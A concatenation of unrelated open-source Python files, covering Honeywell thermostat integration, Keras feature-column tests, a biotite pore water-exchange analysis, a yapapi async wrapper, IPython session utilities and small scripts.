cpo.config.configuration_manager.get_deps_directory_path() / "config" / "cpd-custom-resources.json"
) as json_file:
for key, value in json.load(json_file).items():
self._custom_resources[key] = CustomResourceMetadata(
description=value["description"],
group=value["group"],
kind=value["kind"],
licenses=list(map(lambda license: CloudPakForDataServiceLicense[license], value["licenses"])),
name=value["name"],
operator_name=value["operator_name"],
spec=value["spec"],
status_key_name=value["status_key_name"],
storage_option_required=value["storage_option_required"],
version=value["version"],
)
def _initialize_subscriptions_dict_if_required(self):
if len(self._subscriptions) == 0:
with open(
cpo.config.configuration_manager.get_deps_directory_path() / "config" / "cpd-subscriptions.json"
) as json_file:
for key, value in json.load(json_file).items():
self._subscriptions[key] = SubscriptionMetadata(
dependencies=value["dependencies"],
labels=value["labels"],
name=value["name"],
operand_request_dependencies=value["operand_request_dependencies"],
required_namespace=value["required_namespace"],
service=value["service"],
spec=SubscriptionMetadataSpec(
channel=value["spec"]["channel"],
name=value["spec"]["name"],
),
)
|
the-stack_106_23343 | #Faça um programa que leia 5 números e informe a soma e a média dos números.
soma=0
media=0
contador=0
for i in range(5):
n=float(input("digite o número: "))
soma=soma+n
contador=contador+1
media=(soma)/contador
print('A soma é:', soma)
print("A média é:", media)
|
the-stack_106_23345 | """
Support for Honeywell Round Connected and Honeywell Evohome thermostats.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/climate.honeywell/
"""
import logging
import socket
import datetime
import requests
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.components.climate import (
ClimateDevice, PLATFORM_SCHEMA, ATTR_FAN_MODE, ATTR_FAN_LIST,
ATTR_OPERATION_MODE, ATTR_OPERATION_LIST, SUPPORT_TARGET_TEMPERATURE,
SUPPORT_AWAY_MODE, SUPPORT_OPERATION_MODE)
from homeassistant.const import (
CONF_PASSWORD, CONF_USERNAME, TEMP_CELSIUS, TEMP_FAHRENHEIT,
ATTR_TEMPERATURE, CONF_REGION)
REQUIREMENTS = ['evohomeclient==0.2.5', 'somecomfort==0.5.2']
_LOGGER = logging.getLogger(__name__)
ATTR_FAN = 'fan'
ATTR_SYSTEM_MODE = 'system_mode'
ATTR_CURRENT_OPERATION = 'equipment_output_status'
CONF_AWAY_TEMPERATURE = 'away_temperature'
CONF_COOL_AWAY_TEMPERATURE = 'away_cool_temperature'
CONF_HEAT_AWAY_TEMPERATURE = 'away_heat_temperature'
DEFAULT_AWAY_TEMPERATURE = 16
DEFAULT_COOL_AWAY_TEMPERATURE = 30
DEFAULT_HEAT_AWAY_TEMPERATURE = 16
DEFAULT_REGION = 'eu'
REGIONS = ['eu', 'us']
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_AWAY_TEMPERATURE,
default=DEFAULT_AWAY_TEMPERATURE): vol.Coerce(float),
vol.Optional(CONF_COOL_AWAY_TEMPERATURE,
default=DEFAULT_COOL_AWAY_TEMPERATURE): vol.Coerce(float),
vol.Optional(CONF_HEAT_AWAY_TEMPERATURE,
default=DEFAULT_HEAT_AWAY_TEMPERATURE): vol.Coerce(float),
vol.Optional(CONF_REGION, default=DEFAULT_REGION): vol.In(REGIONS),
})
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Set up the Honeywell thermostat."""
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
region = config.get(CONF_REGION)
if region == 'us':
return _setup_us(username, password, config, add_devices)
return _setup_round(username, password, config, add_devices)
def _setup_round(username, password, config, add_devices):
"""Set up the rounding function."""
from evohomeclient import EvohomeClient
away_temp = config.get(CONF_AWAY_TEMPERATURE)
evo_api = EvohomeClient(username, password)
try:
zones = evo_api.temperatures(force_refresh=True)
for i, zone in enumerate(zones):
add_devices(
[RoundThermostat(evo_api, zone['id'], i == 0, away_temp)],
True
)
except socket.error:
_LOGGER.error(
"Connection error logging into the honeywell evohome web service")
return False
return True
# config will be used later
def _setup_us(username, password, config, add_devices):
"""Set up the user."""
import somecomfort
try:
client = somecomfort.SomeComfort(username, password)
except somecomfort.AuthError:
_LOGGER.error("Failed to login to honeywell account %s", username)
return False
except somecomfort.SomeComfortError as ex:
_LOGGER.error("Failed to initialize honeywell client: %s", str(ex))
return False
dev_id = config.get('thermostat')
loc_id = config.get('location')
cool_away_temp = config.get(CONF_COOL_AWAY_TEMPERATURE)
heat_away_temp = config.get(CONF_HEAT_AWAY_TEMPERATURE)
add_devices([HoneywellUSThermostat(client, device, cool_away_temp,
heat_away_temp, username, password)
for location in client.locations_by_id.values()
for device in location.devices_by_id.values()
if ((not loc_id or location.locationid == loc_id) and
(not dev_id or device.deviceid == dev_id))])
return True
class RoundThermostat(ClimateDevice):
"""Representation of a Honeywell Round Connected thermostat."""
def __init__(self, client, zone_id, master, away_temp):
"""Initialize the thermostat."""
self.client = client
self._current_temperature = None
self._target_temperature = None
self._name = 'round connected'
self._id = zone_id
self._master = master
self._is_dhw = False
self._away_temp = away_temp
self._away = False
@property
def supported_features(self):
"""Return the list of supported features."""
supported = (SUPPORT_TARGET_TEMPERATURE | SUPPORT_AWAY_MODE)
if hasattr(self.client, ATTR_SYSTEM_MODE):
supported |= SUPPORT_OPERATION_MODE
return supported
@property
def name(self):
"""Return the name of the honeywell, if any."""
return self._name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return TEMP_CELSIUS
@property
def current_temperature(self):
"""Return the current temperature."""
return self._current_temperature
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
if self._is_dhw:
return None
return self._target_temperature
def set_temperature(self, **kwargs):
"""Set new target temperature."""
temperature = kwargs.get(ATTR_TEMPERATURE)
if temperature is None:
return
self.client.set_temperature(self._name, temperature)
@property
def current_operation(self) -> str:
"""Get the current operation of the system."""
return getattr(self.client, ATTR_SYSTEM_MODE, None)
@property
def is_away_mode_on(self):
"""Return true if away mode is on."""
return self._away
def set_operation_mode(self, operation_mode: str) -> None:
"""Set the HVAC mode for the thermostat."""
if hasattr(self.client, ATTR_SYSTEM_MODE):
self.client.system_mode = operation_mode
def turn_away_mode_on(self):
"""Turn away on.
Honeywell does have a proprietary away mode, but it doesn't really work
the way it should. For example: If you set a temperature manually
it doesn't get overwritten when away mode is switched on.
"""
self._away = True
self.client.set_temperature(self._name, self._away_temp)
def turn_away_mode_off(self):
"""Turn away off."""
self._away = False
self.client.cancel_temp_override(self._name)
def update(self):
"""Get the latest date."""
try:
# Only refresh if this is the "master" device,
# others will pick up the cache
for val in self.client.temperatures(force_refresh=self._master):
if val['id'] == self._id:
data = val
except KeyError:
_LOGGER.error("Update failed from Honeywell server")
self.client.user_data = None
return
except StopIteration:
_LOGGER.error("Did not receive any temperature data from the "
"evohomeclient API")
return
self._current_temperature = data['temp']
self._target_temperature = data['setpoint']
if data['thermostat'] == 'DOMESTIC_HOT_WATER':
self._name = 'Hot Water'
self._is_dhw = True
else:
self._name = data['name']
self._is_dhw = False
# The underlying library doesn't expose the thermostat's mode
# but we can pull it out of the big dictionary of information.
device = self.client.devices[self._id]
self.client.system_mode = device[
'thermostat']['changeableValues']['mode']
class HoneywellUSThermostat(ClimateDevice):
"""Representation of a Honeywell US Thermostat."""
def __init__(self, client, device, cool_away_temp,
heat_away_temp, username, password):
"""Initialize the thermostat."""
self._client = client
self._device = device
self._cool_away_temp = cool_away_temp
self._heat_away_temp = heat_away_temp
self._away = False
self._username = username
self._password = password
@property
def supported_features(self):
"""Return the list of supported features."""
supported = (SUPPORT_TARGET_TEMPERATURE | SUPPORT_AWAY_MODE)
if hasattr(self._device, ATTR_SYSTEM_MODE):
supported |= SUPPORT_OPERATION_MODE
return supported
@property
def is_fan_on(self):
"""Return true if fan is on."""
return self._device.fan_running
@property
def name(self):
"""Return the name of the honeywell, if any."""
return self._device.name
@property
def temperature_unit(self):
"""Return the unit of measurement."""
return (TEMP_CELSIUS if self._device.temperature_unit == 'C'
else TEMP_FAHRENHEIT)
@property
def current_temperature(self):
"""Return the current temperature."""
return self._device.current_temperature
@property
def target_temperature(self):
"""Return the temperature we try to reach."""
if self._device.system_mode == 'cool':
return self._device.setpoint_cool
return self._device.setpoint_heat
@property
def current_operation(self) -> str:
"""Return current operation ie. heat, cool, idle."""
oper = getattr(self._device, ATTR_CURRENT_OPERATION, None)
if oper == "off":
oper = "idle"
return oper
def set_temperature(self, **kwargs):
"""Set target temperature."""
temperature = kwargs.get(ATTR_TEMPERATURE)
if temperature is None:
return
import somecomfort
try:
# Get current mode
mode = self._device.system_mode
# Set hold if this is not the case
if getattr(self._device, "hold_{}".format(mode)) is False:
# Get next period key
next_period_key = '{}NextPeriod'.format(mode.capitalize())
# Get next period raw value
next_period = self._device.raw_ui_data.get(next_period_key)
# Get next period time
hour, minute = divmod(next_period * 15, 60)
# Set hold time
setattr(self._device,
"hold_{}".format(mode),
datetime.time(hour, minute))
# Set temperature
setattr(self._device,
"setpoint_{}".format(mode),
temperature)
except somecomfort.SomeComfortError:
_LOGGER.error("Temperature %.1f out of range", temperature)
@property
def device_state_attributes(self):
"""Return the device specific state attributes."""
import somecomfort
data = {
ATTR_FAN: (self.is_fan_on and 'running' or 'idle'),
ATTR_FAN_MODE: self._device.fan_mode,
ATTR_OPERATION_MODE: self._device.system_mode,
}
data[ATTR_FAN_LIST] = somecomfort.FAN_MODES
data[ATTR_OPERATION_LIST] = somecomfort.SYSTEM_MODES
return data
@property
def is_away_mode_on(self):
"""Return true if away mode is on."""
return self._away
def turn_away_mode_on(self):
"""Turn away on.
Somecomfort does have a proprietary away mode, but it doesn't really
work the way it should. For example: If you set a temperature manually
it doesn't get overwritten when away mode is switched on.
"""
self._away = True
import somecomfort
try:
# Get current mode
mode = self._device.system_mode
except somecomfort.SomeComfortError:
_LOGGER.error('Can not get system mode')
return
try:
# Set permanent hold
setattr(self._device,
"hold_{}".format(mode),
True)
# Set temperature
setattr(self._device,
"setpoint_{}".format(mode),
getattr(self, "_{}_away_temp".format(mode)))
except somecomfort.SomeComfortError:
_LOGGER.error('Temperature %.1f out of range',
getattr(self, "_{}_away_temp".format(mode)))
def turn_away_mode_off(self):
"""Turn away off."""
self._away = False
import somecomfort
try:
# Disabling all hold modes
self._device.hold_cool = False
self._device.hold_heat = False
except somecomfort.SomeComfortError:
_LOGGER.error('Can not stop hold mode')
def set_operation_mode(self, operation_mode: str) -> None:
"""Set the system mode (Cool, Heat, etc)."""
if hasattr(self._device, ATTR_SYSTEM_MODE):
self._device.system_mode = operation_mode
def update(self):
"""Update the state."""
import somecomfort
retries = 3
while retries > 0:
try:
self._device.refresh()
break
except (somecomfort.client.APIRateLimited, OSError,
requests.exceptions.ReadTimeout) as exp:
retries -= 1
if retries == 0:
raise exp
if not self._retry():
raise exp
_LOGGER.error(
"SomeComfort update failed, Retrying - Error: %s", exp)
def _retry(self):
"""Recreate a new somecomfort client.
When we got an error, the best way to be sure that the next query
will succeed, is to recreate a new somecomfort client.
"""
import somecomfort
try:
self._client = somecomfort.SomeComfort(
self._username, self._password)
except somecomfort.AuthError:
_LOGGER.error("Failed to login to honeywell account %s",
self._username)
return False
except somecomfort.SomeComfortError as ex:
_LOGGER.error("Failed to initialize honeywell client: %s",
str(ex))
return False
devices = [device
for location in self._client.locations_by_id.values()
for device in location.devices_by_id.values()
if device.name == self._device.name]
if len(devices) != 1:
_LOGGER.error("Failed to find device %s", self._device.name)
return False
self._device = devices[0]
return True
|
the-stack_106_23346 | #!/bin/python3
"""
Copyright kubeinit contributors.
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at:
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations
under the License.
"""
import os
import re
from jinja2 import Environment, FileSystemLoader
from kubeinit_ci_utils import get_periodic_jobs_labels
def main():
"""Run the main method."""
labels = get_periodic_jobs_labels()
jobs = []
for label in labels:
if re.match(r"[a-z|0-9|\.]+-[a-z]+-\d+-\d+-\d+-[c|h]", label):
print("'render_periodic_jobs_page.py' ==> Matching a periodic job label")
params = label.split("-")
distro = params[0]
driver = params[1]
masters = params[2]
workers = params[3]
hypervisors = params[4]
launch_from = params[5]
if distro == 'okd':
distro = "Origin Distribution of K8s"
elif distro == 'kid':
distro = "KubeInit distro"
elif distro == 'eks':
distro = "Amazon EKS Distro"
elif distro == 'rke':
distro = "Rancher K8s Engine"
elif distro == 'cdk':
distro = "Canonical Distribution of K8s"
elif distro == 'k8s':
distro = "Vanilla K8s"
elif '.' in distro:
distro = distro.upper().replace('.', '/')
if launch_from == 'h':
launch_from = "Host"
elif launch_from == 'c':
launch_from = "Container"
else:
print("'render_periodic_jobs_page.py' ==> This label do not match")
print(label)
raise Exception("'render_periodic_jobs_page.py' ==> This label do not match: %s" % (label))
jobs.append({'distro': distro,
'driver': driver,
'masters': masters,
'workers': workers,
'hypervisors': hypervisors,
'launch_from': launch_from,
'url': "<a href='https://storage.googleapis.com/kubeinit-ci/jobs/" + label + "-periodic-pid-weekly-u/index.html'><img height='20px' src='https://storage.googleapis.com/kubeinit-ci/jobs/" + label + "-periodic-pid-weekly-u/badge_status.svg'/></a>"})
path = os.path.join(os.path.dirname(__file__))
file_loader = FileSystemLoader(searchpath=path)
env = Environment(loader=file_loader)
template_index = "periodic_jobs.md.j2"
print("'render_periodic_jobs_page.py' ==> The path for the template is: " + path)
template = env.get_template(template_index)
output = template.render(jobs=jobs)
with open("periodic_jobs.md", "w+") as text_file:
text_file.write(output)
if __name__ == "__main__":
main()
|
the-stack_106_23347 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests specific to Feature Columns integration."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.feature_column import feature_column_lib as fc
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import metrics as metrics_module
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.utils import np_utils
from tensorflow.python.platform import test
class TestDNNModel(keras.models.Model):
def __init__(self, feature_columns, units, name=None, **kwargs):
super(TestDNNModel, self).__init__(name=name, **kwargs)
self._input_layer = fc.DenseFeatures(feature_columns, name='input_layer')
self._dense_layer = keras.layers.Dense(units, name='dense_layer')
def call(self, features):
net = self._input_layer(features)
net = self._dense_layer(net)
return net
class FeatureColumnsIntegrationTest(keras_parameterized.TestCase):
"""Most Sequential model API tests are covered in `training_test.py`.
"""
@keras_parameterized.run_all_keras_modes
def test_sequential_model(self):
columns = [fc.numeric_column('a')]
model = keras.models.Sequential([
fc.DenseFeatures(columns),
keras.layers.Dense(64, activation='relu'),
keras.layers.Dense(20, activation='softmax')
])
model.compile(
optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
x = {'a': np.random.random((10, 1))}
y = np.random.randint(20, size=(10, 1))
y = np_utils.to_categorical(y, num_classes=20)
model.fit(x, y, epochs=1, batch_size=5)
model.fit(x, y, epochs=1, batch_size=5)
model.evaluate(x, y, batch_size=5)
model.predict(x, batch_size=5)
@keras_parameterized.run_all_keras_modes
def test_sequential_model_with_ds_input(self):
columns = [fc.numeric_column('a')]
model = keras.models.Sequential([
fc.DenseFeatures(columns),
keras.layers.Dense(64, activation='relu'),
keras.layers.Dense(20, activation='softmax')
])
model.compile(
optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
y = np.random.randint(20, size=(100, 1))
y = np_utils.to_categorical(y, num_classes=20)
x = {'a': np.random.random((100, 1))}
ds1 = dataset_ops.Dataset.from_tensor_slices(x)
ds2 = dataset_ops.Dataset.from_tensor_slices(y)
ds = dataset_ops.Dataset.zip((ds1, ds2)).batch(5)
model.fit(ds, steps_per_epoch=1)
model.fit(ds, steps_per_epoch=1)
model.evaluate(ds, steps=1)
model.predict(ds, steps=1)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_sequential_model_with_crossed_column(self):
feature_columns = []
age_buckets = fc.bucketized_column(
fc.numeric_column('age'),
boundaries=[18, 25, 30, 35, 40, 45, 50, 55, 60, 65])
feature_columns.append(age_buckets)
# indicator cols
thal = fc.categorical_column_with_vocabulary_list(
'thal', ['fixed', 'normal', 'reversible'])
crossed_feature = fc.crossed_column([age_buckets, thal],
hash_bucket_size=1000)
crossed_feature = fc.indicator_column(crossed_feature)
feature_columns.append(crossed_feature)
feature_layer = fc.DenseFeatures(feature_columns)
model = keras.models.Sequential([
feature_layer,
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
])
age_data = np.random.randint(10, 100, size=100)
thal_data = np.random.choice(['fixed', 'normal', 'reversible'], size=100)
inp_x = {'age': age_data, 'thal': thal_data}
inp_y = np.random.randint(0, 1, size=100)
ds = dataset_ops.Dataset.from_tensor_slices((inp_x, inp_y)).batch(5)
model.compile(optimizer='adam',
loss='binary_crossentropy',
metrics=['accuracy'],)
model.fit(ds, epochs=1)
model.fit(ds, epochs=1)
model.evaluate(ds)
model.predict(ds)
@keras_parameterized.run_all_keras_modes
def test_subclassed_model_with_feature_columns(self):
col_a = fc.numeric_column('a')
col_b = fc.numeric_column('b')
dnn_model = TestDNNModel([col_a, col_b], 20)
dnn_model.compile(
optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
x = {'a': np.random.random((10, 1)), 'b': np.random.random((10, 1))}
y = np.random.randint(20, size=(10, 1))
y = np_utils.to_categorical(y, num_classes=20)
dnn_model.fit(x=x, y=y, epochs=1, batch_size=5)
dnn_model.fit(x=x, y=y, epochs=1, batch_size=5)
dnn_model.evaluate(x=x, y=y, batch_size=5)
dnn_model.predict(x=x, batch_size=5)
@keras_parameterized.run_all_keras_modes
def test_subclassed_model_with_feature_columns_with_ds_input(self):
col_a = fc.numeric_column('a')
col_b = fc.numeric_column('b')
dnn_model = TestDNNModel([col_a, col_b], 20)
dnn_model.compile(
optimizer='rmsprop',
loss='categorical_crossentropy',
metrics=['accuracy'],
run_eagerly=testing_utils.should_run_eagerly())
y = np.random.randint(20, size=(100, 1))
y = np_utils.to_categorical(y, num_classes=20)
x = {'a': np.random.random((100, 1)), 'b': np.random.random((100, 1))}
ds1 = dataset_ops.Dataset.from_tensor_slices(x)
ds2 = dataset_ops.Dataset.from_tensor_slices(y)
ds = dataset_ops.Dataset.zip((ds1, ds2)).batch(5)
dnn_model.fit(ds, steps_per_epoch=1)
dnn_model.fit(ds, steps_per_epoch=1)
dnn_model.evaluate(ds, steps=1)
dnn_model.predict(ds, steps=1)
# TODO(kaftan) seems to throw an error when enabled.
@keras_parameterized.run_all_keras_modes
def DISABLED_test_function_model_feature_layer_input(self):
col_a = fc.numeric_column('a')
col_b = fc.numeric_column('b')
feature_layer = fc.DenseFeatures([col_a, col_b], name='fc')
dense = keras.layers.Dense(4)
# This seems problematic.... We probably need something for DenseFeatures
# the way Input is for InputLayer.
output = dense(feature_layer)
model = keras.models.Model([feature_layer], [output])
optimizer = 'rmsprop'
loss = 'mse'
loss_weights = [1., 0.5]
model.compile(
optimizer,
loss,
metrics=[metrics_module.CategoricalAccuracy(), 'mae'],
loss_weights=loss_weights)
data = ({'a': np.arange(10), 'b': np.arange(10)}, np.arange(10, 20))
model.fit(*data, epochs=1)
# TODO(kaftan) seems to throw an error when enabled.
@keras_parameterized.run_all_keras_modes
def DISABLED_test_function_model_multiple_feature_layer_inputs(self):
col_a = fc.numeric_column('a')
col_b = fc.numeric_column('b')
col_c = fc.numeric_column('c')
fc1 = fc.DenseFeatures([col_a, col_b], name='fc1')
fc2 = fc.DenseFeatures([col_b, col_c], name='fc2')
dense = keras.layers.Dense(4)
# This seems problematic.... We probably need something for DenseFeatures
# the way Input is for InputLayer.
output = dense(fc1) + dense(fc2)
model = keras.models.Model([fc1, fc2], [output])
optimizer = 'rmsprop'
loss = 'mse'
loss_weights = [1., 0.5]
model.compile(
optimizer,
loss,
metrics=[metrics_module.CategoricalAccuracy(), 'mae'],
loss_weights=loss_weights)
data_list = ([{
'a': np.arange(10),
'b': np.arange(10)
}, {
'b': np.arange(10),
'c': np.arange(10)
}], np.arange(10, 100))
model.fit(*data_list, epochs=1)
data_bloated_list = ([{
'a': np.arange(10),
'b': np.arange(10),
'c': np.arange(10)
}, {
'a': np.arange(10),
'b': np.arange(10),
'c': np.arange(10)
}], np.arange(10, 100))
model.fit(*data_bloated_list, epochs=1)
data_dict = ({
'fc1': {
'a': np.arange(10),
'b': np.arange(10)
},
'fc2': {
'b': np.arange(10),
'c': np.arange(10)
}
}, np.arange(10, 100))
model.fit(*data_dict, epochs=1)
data_bloated_dict = ({
'fc1': {
'a': np.arange(10),
'b': np.arange(10),
'c': np.arange(10)
},
'fc2': {
'a': np.arange(10),
'b': np.arange(10),
'c': np.arange(10)
}
}, np.arange(10, 100))
model.fit(*data_bloated_dict, epochs=1)
@keras_parameterized.run_all_keras_modes
def test_string_input(self):
x = {'age': np.random.random((1024, 1)),
'cabin': np.array(['a'] * 1024)}
y = np.random.randint(2, size=(1024, 1))
ds1 = dataset_ops.Dataset.from_tensor_slices(x)
ds2 = dataset_ops.Dataset.from_tensor_slices(y)
dataset = dataset_ops.Dataset.zip((ds1, ds2)).batch(4)
categorical_cols = [fc.categorical_column_with_hash_bucket('cabin', 10)]
feature_cols = ([fc.numeric_column('age')]
+ [fc.indicator_column(cc) for cc in categorical_cols])
layers = [fc.DenseFeatures(feature_cols),
keras.layers.Dense(128),
keras.layers.Dense(1)]
model = keras.models.Sequential(layers)
model.compile(optimizer='sgd',
loss=keras.losses.BinaryCrossentropy())
model.fit(dataset)
if __name__ == '__main__':
test.main()
|
the-stack_106_23349 | r"""
Cavity solvation in different states of HCN4
============================================
In selective sodium/potassium channels, the internal cavity of the pore
is walled off from the solvent if the channel is closed.
Upon activation, the internal gate opens and exchange of water molecules
between the cavity and the bulk medium is possible.
Therefore, one can track the exchange rate of water molecules between
the cavity and bulk to evaluate if a pore is open, closed, or in a
transition between the two. Here, we used the distance between water
molecules and residues located in the central cavity to evaluate if
persistant water exchange takes place in different structures of the
HCN4 channel.
The trajectories and template structure are not included in this
example.
However, the trajectories are based of publicly accessible structures
of the open (PDB: 7NP3) and closed (PDB: 7NP4) state.
.. image:: ../../scripts/structure/water_exchange.png
"""
# Code source: Daniel Bauer, Patrick Kunzmann
# License: BSD 3 clause
import matplotlib.pyplot as plt
import numpy as np
import biotite
import biotite.structure.io.gro as gro
import biotite.structure.io.xtc as xtc
import biotite.structure as struct
def water_in_prox(atoms, sele, cutoff):
"""
Get the atom indices of water oxygen atoms that are in vicinity of
the selected atoms.
"""
cell_list = struct.CellList(atoms, cell_size=5,
selection=atoms.atom_name == "OW")
adjacent_atoms = cell_list.get_atoms(atoms[sele].coord, cutoff)
adjacent_atoms = np.unique(adjacent_atoms.flatten())
adjacent_atoms = adjacent_atoms[adjacent_atoms > 0]
return adjacent_atoms
def cum_water_in_pore(traj, cutoff=6, key_residues=(507, 511)):
"""
Calculate the cumulative number of water molecules visiting the
pore.
"""
protein_sele = np.isin(traj.res_id, key_residues) \
& ~np.isin(traj.atom_name, ["N", "O", "CA", "C"])
water_count = np.zeros(traj.shape[0])
prev_counted_indices = []
for idx, frame in enumerate(traj):
indices = water_in_prox(frame, protein_sele, cutoff)
count = (~np.isin(indices, prev_counted_indices)).sum()
if idx != 0:
count += water_count[idx-1]
water_count[idx] = count
prev_counted_indices = indices
return water_count
# Calculate the cumulative number water molecules visiting the pore
# for the open and closed state
counts = []
for name in ["apo", "holo"]:
gro_file = gro.GROFile.read(f"{name}.gro")
template = gro_file.get_structure(model=1)
# Represent the water molecules by the oxygen atom
filter_indices = np.where(
struct.filter_amino_acids(template) | (template.atom_name == "OW")
)[0]
xtc_file = xtc.XTCFile.read(f"{name}.xtc", atom_i=filter_indices)
traj = xtc_file.get_structure(template[filter_indices])
cum_count = cum_water_in_pore(traj)
counts.append(cum_count)
time = np.arange(len(counts[0])) * 40 / 1000
# Linear fitting
from pylab import polyfit
open_fit = polyfit(time, counts[0], 1)
closed_fit = polyfit(time, counts[1], 1)
fig, ax = plt.subplots(figsize=(8.0, 4.0))
ax.plot(time, counts[0],
label="open pore", color=biotite.colors["dimgreen"])
ax.plot(time, open_fit[0]*time+open_fit[1],
linestyle="--", color="black", zorder=-1)
ax.plot(time, counts[1],
label="closed pore", color=biotite.colors["lightorange"])
ax.plot(time, closed_fit[0]*time+closed_fit[1],
linestyle="--", color="black", zorder=-1)
ax.set(
xlabel = "Time / ns",
ylabel = "Count",
title = "Cumulative count\nof individual water molecules visiting the pore"
)
ax.legend()
ax.annotate(f"{open_fit[0]:.1f} per ns",
xy=(20, 20*open_fit[0]+open_fit[1]+100),
xytext=(20-5, 20*open_fit[0]+open_fit[1]+1300),
arrowprops=dict(facecolor=biotite.colors["darkgreen"]),
va="center")
ax.annotate(f"{closed_fit[0]:.1f} per ns",
xy=(30, 20*closed_fit[0]+closed_fit[1]+100),
xytext=(30+2, 20*closed_fit[0]+closed_fit[1]+1300),
arrowprops=dict(facecolor=biotite.colors["orange"]),
va="center")
fig.savefig("water_exchange.png", bbox_inches="tight")
plt.show() |
the-stack_106_23350 | """Utility functions and classes used within the `yapapi.executor` package."""
import asyncio
import logging
from typing import Callable, Optional
logger = logging.getLogger(__name__)
class AsyncWrapper:
"""Wraps a given callable to provide asynchronous calls.
Example usage:
with AsyncWrapper(func) as wrapper:
wrapper.async_call("Hello", world=True)
wrapper.async_call("Bye!")
The above code will make two asynchronous calls to `func`.
The results of the calls, if any, are discarded, so this class is
most useful for wrapping callables that return `None`.
"""
_wrapped: Callable
_args_buffer: asyncio.Queue
_task: Optional[asyncio.Task]
def __init__(self, wrapped: Callable, event_loop: Optional[asyncio.AbstractEventLoop] = None):
self._wrapped = wrapped # type: ignore # suppress mypy issue #708
self._args_buffer = asyncio.Queue()
loop = event_loop or asyncio.get_event_loop()
self._task = loop.create_task(self._worker())
async def _worker(self) -> None:
while True:
try:
(args, kwargs) = await self._args_buffer.get()
try:
self._wrapped(*args, **kwargs)
finally:
self._args_buffer.task_done()
except KeyboardInterrupt as ke:
# Don't stop on KeyboardInterrupt, but pass it to the event loop
logger.debug("Caught KeybordInterrupt in AsyncWrapper's worker task")
def raise_interrupt(ke_):
raise ke_
asyncio.get_event_loop().call_soon(raise_interrupt, ke)
except asyncio.CancelledError:
logger.debug("AsyncWrapper's worker task cancelled")
break
except Exception:
logger.exception("Unhandled exception in wrapped callable")
async def stop(self) -> None:
"""Stop the wrapper, process queued calls but do not accept any new ones."""
if self._task:
# Set self._task to None so we don't accept any more calls in `async_call()`
worker_task = self._task
self._task = None
await self._args_buffer.join()
worker_task.cancel()
await asyncio.gather(worker_task, return_exceptions=True)
def async_call(self, *args, **kwargs) -> None:
"""Schedule an asynchronous call to the wrapped callable."""
if not self._task or self._task.done():
raise RuntimeError("AsyncWrapper is closed")
self._args_buffer.put_nowait((args, kwargs))
|
the-stack_106_23354 | """Session object for building, serializing, sending, and receiving messages in
IPython. The Session object supports serialization, HMAC signatures, and
metadata on messages.
Also defined here are utilities for working with Sessions:
* A SessionFactory to be used as a base class for configurables that work with
Sessions.
* A Message object for convenience that allows attribute-access to the msg dict.
Authors:
* Min RK
* Brian Granger
* Fernando Perez
"""
#-----------------------------------------------------------------------------
# Copyright (C) 2010-2011 The IPython Development Team
#
# Distributed under the terms of the BSD License. The full license is in
# the file COPYING, distributed as part of this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import hmac
import logging
import os
import pprint
import uuid
from datetime import datetime
try:
import cPickle
pickle = cPickle
except:
cPickle = None
import pickle
import zmq
from zmq.utils import jsonapi
from zmq.eventloop.ioloop import IOLoop
from zmq.eventloop.zmqstream import ZMQStream
from IPython.config.application import Application, boolean_flag
from IPython.config.configurable import Configurable, LoggingConfigurable
from IPython.utils.importstring import import_item
from IPython.utils.jsonutil import extract_dates, squash_dates, date_default
from IPython.utils.py3compat import str_to_bytes
from IPython.utils.traitlets import (CBytes, Unicode, Bool, Any, Instance, Set,
DottedObjectName, CUnicode)
#-----------------------------------------------------------------------------
# utility functions
#-----------------------------------------------------------------------------
def squash_unicode(obj):
"""coerce unicode back to bytestrings."""
if isinstance(obj,dict):
for key in obj.keys():
obj[key] = squash_unicode(obj[key])
if isinstance(key, unicode):
obj[squash_unicode(key)] = obj.pop(key)
elif isinstance(obj, list):
for i,v in enumerate(obj):
obj[i] = squash_unicode(v)
elif isinstance(obj, unicode):
obj = obj.encode('utf8')
return obj
#-----------------------------------------------------------------------------
# globals and defaults
#-----------------------------------------------------------------------------
# ISO8601-ify datetime objects
json_packer = lambda obj: jsonapi.dumps(obj, default=date_default)
json_unpacker = lambda s: extract_dates(jsonapi.loads(s))
pickle_packer = lambda o: pickle.dumps(o,-1)
pickle_unpacker = pickle.loads
default_packer = json_packer
default_unpacker = json_unpacker
DELIM=b"<IDS|MSG>"
#-----------------------------------------------------------------------------
